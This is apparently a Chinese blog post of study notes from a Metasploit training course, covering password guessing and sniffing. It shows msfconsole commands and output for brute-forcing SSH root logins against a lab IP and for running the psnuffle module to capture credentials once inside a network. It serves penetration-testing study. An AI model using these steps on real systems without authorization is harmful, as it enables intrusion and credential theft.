zoukankan      html  css  js  c++  java
  • MSF魔鬼训练营-3.3.2 口令猜测与嗅探

    密码暴力破解以SSH为例,其他协议方法类似
    SSH
         msf > use auxiliary/scanner/ssh/ssh_login
    msf auxiliary(ssh_login) > set rhosts 192.168.3.199
    rhosts => 192.168.3.199
    msf auxiliary(ssh_login) > set username root
    username => root
    msf auxiliary(ssh_login) > set pass_file /root/pass.txt
    pass_file => /root/pass.txt
    msf auxiliary(ssh_login) > set threads 100
    threads => 100
    msf auxiliary(ssh_login) > run
     
    [*] SSH - Starting bruteforce
    [-] SSH - Failed: 'root:19500101an'
    [-] SSH - Failed: 'root:19500101ba'
    [-] SSH - Failed: 'root:19500101bai'
    [-] SSH - Failed: 'root:19500101ban'
    [-] SSH - Failed: 'root:19500101bao'
    [-] SSH - Failed: 'root:19500101bei'
    [-] SSH - Failed: 'root:19500101bi'
    [-] SSH - Failed: 'root:19500101bian'
     

    在计入对方网络的初始访问点后才能够方便的使用psnuffle模块进行口令嗅探。条件允许的话再介入网络的整个过程都要保持嗅探器的运行。增加截获口令的可能性。
    msf > use auxiliary/sniffer/psnuffle
    msf auxiliary(psnuffle) > show options
     
    Module options (auxiliary/sniffer/psnuffle):
     
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       FILTER                      no        The filter string for capturing traffic
       INTERFACE                   no        The name of the interface
       PCAPFILE                    no        The name of the PCAP capture file to process
       PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
       SNAPLEN    65535            yes       The number of bytes to capture
       TIMEOUT    500              yes       The number of seconds to wait for new data
     
     
    Auxiliary action:
     
       Name     Description
       ----     -----------
       Sniffer 
     
     
    msf auxiliary(psnuffle) > run
    [*] Auxiliary module execution completed
    msf auxiliary(psnuffle) >
    [*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
    [*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
    [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
    [*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
    [*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
    [*] Sniffing traffic.....
     
     
  • 相关阅读:
    在Leangoo里怎么修改昵称,简称,头像?
    在Leangoo里怎么找到用户中心?
    Maven相关: An internal error occurred during: "Updating Maven Project". java.lang.NullPointerException
    拦截器与过滤器
    Jfinal基础学习(一)
    mysql中添加一个和root一样的用户用于远程连接
    安卓模拟器安装apk,上网
    简单了解ddos攻击
    eclipse报An error has occurred,See error log for more details. java.lang.NullPointerException错误
    eclipse color themes 让eclipse编码好看点
  • 原文地址:https://www.cnblogs.com/enderzhou/p/7554283.html
Copyright © 2011-2022 走看看